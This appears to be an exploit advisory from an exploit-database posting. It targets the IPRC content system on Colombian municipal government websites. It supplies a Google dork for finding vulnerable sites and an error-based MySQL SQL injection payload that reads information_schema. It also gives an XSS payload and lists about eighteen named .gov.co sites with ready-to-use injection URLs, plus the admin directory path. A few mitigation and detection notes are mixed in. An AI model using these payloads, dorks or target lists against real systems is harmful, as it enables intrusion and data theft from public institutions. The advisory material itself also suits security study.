- +-------------------------------------------------+
- l # Author: Diego Asencio l
- l # Twitter: @Diego_Asencio l
- l # E-mail: diego.asencio@unillanos.edu.co l
- l # WorkGroup: [!]nside [0]utside - T34M l
- l # Twt_WG: @insid30utsid3 l
- +-------------------------------------------------+
- #################
- # INFORMACION #
- #################
- ###########################################################################################################
- # Exploit Title: IPRC - SQL InjecTion / Cross-Site Scripting
- # Vendor Name: Internet Para La Rendicion de Cuentas
- # Url Vendor: http://www.iprc.org.co
- # Category: WebApps
- # Risk: Critical
- # GoogleDork: "index.shtml?apc=I-xx-1-&x=" [or] "sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D= "
- # 0day exploits : 1337day.com Inj3ct0r Exploit DataBase
- ###########################################################################################################
- #################
- # 3XPL0IT #
- #################
- ###########################################################################################################
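- # - [SQL] -
- # Injection point: the `x` query parameter of index.shtml ([M/pio] = municipality, [Dep/to] = department in the host name).
- # http://www.[M/pio]-[Dep/to].gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # Mitigation: bind `x` as a query parameter (the sample value is numeric, so non-numeric input can also be rejected) instead of concatenating it into the SQL string.
- #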
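- # - [XSS] -
- # Injection point: the `als[vbuscar]` parameter of sitio.shtml (URL-encoded as als%5Bvbuscar%5D), presumably the site search field.
- # http://www.[M/pio]-[Dep/to].gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # Mitigation: HTML-encode the value wherever it is written back into the page; the `">` prefix of the sample below suggests it lands inside an attribute value.
- #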
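- # ( SQL payload: error-based, reads MySQL information_schema )
- # Detection: requests to index.shtml whose `x` value contains `information_schema` or `floor(rand(` are a reliable log/WAF indicator of this probe.
- #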
- # 2192436 and(select 1 from(select count(*),concat((select (select %String_Col%) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1
- Count(table_name) of information_schema.tables where table_schema=0x64625F3835303130
- #
- # (XpL XSS )
- #
- # "><img src=http://1337day.org/img/logo_green.jpg onerror=alert("1337");>
- #
- # -----------------------------------------------------------------------------------------------------
- # [ SAMPLE'S WEBSITES AFFECTED (SQL && XSS) INJ3CTI0N ]
- # ______________________________________________________________________________________________________
- #
- # # - SQL - #
- # http://www.puertolopez-meta.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.aguazul-casanare.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.abejorral-antioquia.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.cantagallo-bolivar.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.caldono-cauca.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.belen-boyaca.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.istmina-choco.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.riodeoro-cesar.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.yopal-casanare.gov.co/index.shtml?apc=I-xx-1-&x=[SQL]
- # http://www.sucre-cauca.gov.co /index.shtml?apc=I-xx-1-&x=[SQL]
- # _______________________________________________________________________________________________________
- #
- # # - XSS - #
- # http://www.caqueza-cundinamarca.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.caracoli-antioquia.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.caramanta-antioquia.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.carepa-antioquia.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.www.carmendecarupa-cundinamarca.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.carolinadelprincipe-antioquia.gov.co /sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.cartagenadelchaira-caqueta.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- # http://www.castillalanueva-meta.gov.co/sitio.shtml?apc=B1--&s=B&nocache=1&als%5Bvbuscar%5D=[XSS]
- #
- ########################################################################################################
- :::::::::::::::::::::::::::::::::::::::::::::::::::::::::
- :: Admin directory : /apc-aa/admin/ (access should be restricted to authenticated, trusted networks) ::
- :::::::::::::::::::::::::::::::::::::::::::::::::::::::::
- #############
- # Greet's #
- #################################################################################
- # @Sr_Xaoc - @ZiriusOpCol - @n4p573r - @Nick_Nitrous - @Ur0b0r0x #
- # @inj3ct0r - @Insid30utsid3 - @Anonymous_Co - @The_RevolutionH #
- # @unillanos_ # # 2012 #
- #################################################################################